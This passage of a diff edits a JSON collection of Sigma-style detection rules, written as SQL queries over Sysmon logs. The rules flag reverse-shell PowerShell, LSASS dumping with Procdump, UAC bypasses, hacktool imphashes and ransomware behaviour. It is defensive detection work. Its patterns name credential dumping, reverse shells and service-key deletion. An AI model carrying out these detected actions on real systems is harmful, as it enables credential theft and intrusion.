'%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", @@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "HTML Help HH.EXE Suspicious 